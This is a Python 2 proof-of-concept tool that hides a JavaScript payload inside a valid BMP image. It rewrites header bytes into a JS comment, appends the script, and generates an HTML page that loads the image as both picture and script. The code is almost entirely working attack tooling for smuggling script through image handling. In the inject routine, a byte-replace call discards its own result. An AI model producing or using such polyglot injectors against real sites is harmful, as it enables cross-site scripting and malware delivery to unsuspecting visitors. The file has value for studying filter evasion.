BMPInjector.py

1. #!/usr/bin/env python2
2. #============================================================================================================#
3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
5. #======= Author: marcoramilli.blogspot.com ==================================================================#
6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
7. #======= Disclaimer: ========================================================================================#
8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
14. #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
15. #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
18. #POSSIBILITY OF SUCH DAMAGE.
19. #===========================================================================================================#
20. import argparse
21. import os
22.  
23. #---------------------------------------------------------
24. def _hexify(num):
25. """
26. Converts and formats to hexadecimal
27. """
28. num = "%x" % num
29. if len(num) % 2:
30. num = '0'+num
31. return num.decode('hex')
32.  
33. #---------------------------------------------------------
34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
35. #;alert(_0xe428[0]);"
36. def _generate_and_write_to_file(payload, fname):
37. """
38. Generates a fake but valid BMP within scriting
39. """
40. f = open(fname, "wb")
41. header = (b'\x42\x4D' #Signature BM
42. b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
43. b'\x00\x00\x00\x00' #Reserved
44. b'\x00\x00\x00\x00' #bitmap data offset
45. b''+ _hexify( len(payload) ) + #bitmap header size
46. b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
47. b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
48. b'\x00\x00' #nb_plan
49. b'\x00\x00' #nb per pixel
50. b'\x00\x10\x00\x00' #compression type
51. b'\x00\x00\x00\x00' #image size .. its ignored
52. b'\x00\x00\x00\x01' #Horizontal resolution
53. b'\x00\x00\x00\x01' #Vertial resolution
54. b'\x00\x00\x00\x00' #number of colors
55. b'\x00\x00\x00\x00' #number important colors
56. b'\x00\x00\x00\x80' #palet colors to be complient
57. b'\x00\x80\xff\x80' #palet colors to be complient
58. b'\x80\x00\xff\x2A' #palet colors to be complient
59. b'\x2F\x3D\x31\x3B' #*/=1;
60. )
61. # I made this explicit, step by step .
62. f.write(header)
63. f.write(payload)
64. f.close()
65. return True
66.  
67. #---------------------------------------------------------
68. def _generate_launching_page(f):
69. """
70. Creates the HTML launching page
71. """
72.  
73. htmlpage ="""
74. <html>
75. <head><title>Opening an image</title> </head>
76. <body>
77. <img src=\"""" + f + """\"\>
78. <script src= \"""" + f + """\"> </script>
79. </body>
80. </html>
81. """
82. html = open("run.html", "wb")
83. html.write(htmlpage);
84. html.close()
85. return True
86.  
87. #---------------------------------------------------------
88. def _inject_into_file(payload, fname):
89. """
90. Injects the payload into existing BMP
91. NOTE: if the BMP contains \xFF\x2A might caouse issues
92. """
93. # I know, I can do it all in memory and much more fast.
94. # I wont do it here.
95. f = open(fname, "r+b")
96. b = f.read()
97. b.replace(b'\x2A\x2F',b'\x00\x00')
98. f.close()
99.  
100. f = open(fname, "w+b")
101. f.write(b)
102. f.seek(2,0)
103. f.write(b'\x2F\x2A')
104. f.close()
105.  
106. f = open(fname, "a+b")
107. f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
108. f.write(payload)
109. f.close()
110. return True
111.  
112.  
113. #---------------------------------------------------------
114. if __name__ == "__main__":
115. parser = argparse.ArgumentParser()
116. parser.add_argument("filename",help="the bmp file name to be generated/or infected")
117. parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
118. parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
119. args = parser.parse_args()
120. print("""
121. |======================================================================================================|
122. | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
123. | It is the end user's responsibility to obey all applicable local, state and federal laws. |
124. | Authors assume no liability and are not responsible for any misuse or damage caused by this program |
125. |======================================================================================================|
126. """)
127. if args.inject_to_existing_bmp:
128. _inject_into_file(args.js_payload, args.filename)
129. else:
130. _generate_and_write_to_file(args.js_payload, args.filename)
131.  
132. _generate_launching_page(args.filename)
133. print "[+] Finished!"